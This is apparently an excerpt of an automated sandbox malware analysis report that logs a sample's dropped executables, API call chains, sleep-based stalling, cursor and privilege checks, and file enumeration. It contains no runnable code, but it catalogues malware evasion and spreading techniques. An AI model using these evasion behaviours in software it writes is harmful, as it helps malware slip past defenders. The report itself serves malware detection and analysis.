Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\yrzsecpaticodwrc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

barindex
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040604A2_2_0040604A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0042185B2_2_0042185B
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040683C2_2_0040683C
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040C15D2_2_0040C15D
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041C19E2_2_0041C19E
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004202CD2_2_004202CD
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00420B222_2_00420B22
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0041F6DA2_2_0041F6DA
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_0040E6902_2_0040E690
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00405F6F2_2_00405F6F
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00412FDD2_2_00412FDD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0040683C4_2_0040683C
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041C19E4_2_0041C19E
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00405F6F4_2_00405F6F
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00412FDD4_2_00412FDD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0040604A4_2_0040604A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0042185B4_2_0042185B
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0040C15D4_2_0040C15D
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004202CD4_2_004202CD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00420B224_2_00420B22
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0041F6DA4_2_0041F6DA
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_0040E6904_2_0040E690
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0040604A5_2_0040604A
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0042185B5_2_0042185B
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0040683C5_2_0040683C
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0040C15D5_2_0040C15D
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041C19E5_2_0041C19E
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004202CD5_2_004202CD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00420B225_2_00420B22
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0041F6DA5_2_0041F6DA
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_0040E6905_2_0040E690
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00405F6F5_2_00405F6F
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00412FDD5_2_00412FDD
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0040604A19_2_0040604A
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0042185B19_2_0042185B
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0040683C19_2_0040683C
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0040C15D19_2_0040C15D
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0041C19E19_2_0041C19E
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004202CD19_2_004202CD
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00420B2219_2_00420B22
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0041F6DA19_2_0041F6DA
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_0040E69019_2_0040E690
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00405F6F19_2_00405F6F
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00412FDD19_2_00412FDD
Source: C:\Windows\ojtoccrezqmarmjwql.exeEvasive API call chain: GetComputerName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_2-29605
Source: C:\Windows\ojtoccrezqmarmjwql.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeStalling execution: Execution stalls by calling Sleepgraph_4-31135
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetCursorPos,Sleep,2_2_0040C431
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetCursorPos,Sleep,4_2_0040C431
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetCursorPos,Sleep,5_2_0040C431
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetCursorPos,Sleep,19_2_0040C431
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: GetTickCount,GetAdaptersInfo,GetTickCount,GetAdaptersInfo,inet_addr,2_2_00416896
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetTickCount,GetAdaptersInfo,GetTickCount,GetAdaptersInfo,inet_addr,4_2_00416896
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: GetTickCount,GetAdaptersInfo,GetTickCount,GetAdaptersInfo,inet_addr,5_2_00416896
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 10800000Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeWindow / User API: threadDelayed 3289Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeWindow / User API: threadDelayed 3296Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeWindow / User API: threadDelayed 3045Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeWindow / User API: threadDelayed 1610Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeWindow / User API: threadDelayed 1623Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeWindow / User API: threadDelayed 759Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeWindow / User API: threadDelayed 8968Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_4-31410
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\qfjygajqfqgo\RCX70EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeDropped PE file which has not been started: C:\ylnagyfkxg.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeDropped PE file which has not been started: C:\qfjygajqfqgo.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeDropped PE file which has not been started: C:\qhneokveviakxo.batJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeEvaded block: after key decisiongraph_4-30652
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-29550
Source: C:\Windows\ojtoccrezqmarmjwql.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_2-30223
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_4-30498
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeAPI coverage: 6.8 %
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeAPI coverage: 6.7 %
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeAPI coverage: 0.7 %
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00412FDD19_2_00412FDD
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00412FDD5_2_00412FDD
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exe TID: 2436Thread sleep count: 3289 > 30Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exe TID: 2436Thread sleep count: 3296 > 30Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exe TID: 2436Thread sleep count: 266 > 30Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exe TID: 2436Thread sleep time: -266000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exe TID: 2436Thread sleep count: 3045 > 30Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exe TID: 2436Thread sleep time: -3045000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 4576Thread sleep count: 1610 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 4332Thread sleep count: 1623 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 1192Thread sleep count: 45 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6460Thread sleep time: -570000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 2500Thread sleep time: -600000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6240Thread sleep time: -360000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 5516Thread sleep count: 759 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 5344Thread sleep time: -10800000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 5540Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6240Thread sleep time: -270000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6992Thread sleep count: 160 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6992Thread sleep time: -160000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 7596Thread sleep count: 86 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 7596Thread sleep time: -86000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 5200Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6992Thread sleep count: 8968 > 30Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exe TID: 6992Thread sleep time: -8968000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00407850 lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,2_2_00407850
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00401000 Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,2_2_00401000
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,2_2_00414883
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00408912
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00407259 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,2_2_00407259
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,2_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00407D1E Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,2_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,2_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00406718 GetTickCount,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,2_2_00406718
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00407850 lstrlenA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,4_2_00407850
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,4_2_00414883
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,4_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00406718 lstrcmpiA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00406718
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00401000 lstrcatA,lstrcpyA,Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,4_2_00401000
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00408912 Sleep,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,4_2_00408912
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00407259 Sleep,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,4_2_00407259
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,4_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00407D1E lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,4_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 4_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,4_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00406718 GetTickCount,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,5_2_00406718
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00407850 lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,5_2_00407850
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00401000 Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,5_2_00401000
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,5_2_00414883
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,ShellExecuteA,wsprintfA,ShellExecuteA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,5_2_00408912
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00407259 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,5_2_00407259
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,5_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,5_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00407D1E Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,5_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeCode function: 5_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,5_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00407850 lstrcatA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,FindClose,19_2_00407850
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00401000 Sleep,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,lstrcpyA,lstrcatA,lstrcatA,CopyFileA,FindNextFileA,FindClose,19_2_00401000
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00414883 lstrcatA,lstrcpyA,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,19_2_00414883
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00408912 Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,lstrlenA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,GetUserNameA,wsprintfA,wsprintfA,Sleep,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,LoadLibraryA,EnumResourceNamesA,FreeLibrary,MoveFileA,SetFileAttributesA,FindNextFileA,FindClose,19_2_00408912
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00407259 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrcmpiA,lstrcpyA,lstrlenA,wsprintfA,FindNextFileA,FindClose,19_2_00407259
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004092D5 Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcpyA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,FindNextFileA,FindClose,lstrcpyA,19_2_004092D5
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_004074A2 Sleep,Sleep,wsprintfA,FindFirstFileA,lstrlenA,wsprintfA,lstrlenA,lstrlenA,lstrcmpiA,lstrlenA,wsprintfA,lstrlenA,lstrcpyA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,19_2_004074A2
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00407D1E Sleep,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,FindNextFileA,FindClose,19_2_00407D1E
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00410F49 Sleep,wsprintfA,wsprintfA,FindFirstFileA,FindClose,wsprintfA,FindClose,FindNextFileA,FindClose,19_2_00410F49
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 19_2_00406718 GetTickCount,Sleep,wsprintfA,wsprintfA,FindFirstFileA,lstrcatA,wsprintfA,lstrcpyA,lstrcatA,lstrcatA,SetFileAttributesA,FindNextFileA,FindClose,19_2_00406718
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_004069AA GetLogicalDriveStringsA,Sleep,lstrcpyA,lstrlenA,2_2_004069AA
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeCode function: 2_2_00408D16 InitializeCriticalSection,GetVersionExA,GetVersionExA,GetVersionExA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,GetModuleHandleA,GetProcAddress,2_2_00408D16
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 600000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 10800000Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\zjisvko.exeThread delayed: delay time: 30000Jump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\userJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
Source: C:\Users\user\Desktop\HqvlYZC7Gf.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
Source: takyouhoymc.exe, 00000002.00000002.207849612218.000000000060E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
Source: zjisvko.exe, 00000004.00000002.208993624460.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, zjisvko.exe, 00000005.00000002.208993445273.0000000000618000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 00000007.00000002.207921807137.0000000000668000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 00000009.00000002.208002233659.0000000000728000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 0000000B.00000002.208083143330.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 0000000D.00000002.208164498520.0000000000628000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 00000011.00000002.208434593699.0000000000728000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 00000012.00000002.208475310197.0000000000638000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 00000016.00000002.208520988894.0000000000688000.00000004.00000020.00020000.00000000.sdmp, takyouhoymc.exe, 0000001A.00000002.208571740441.0000000000788000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\takyouhoymc.exeAPI call chain: ExitProcess graph end nodegraph_2-29551
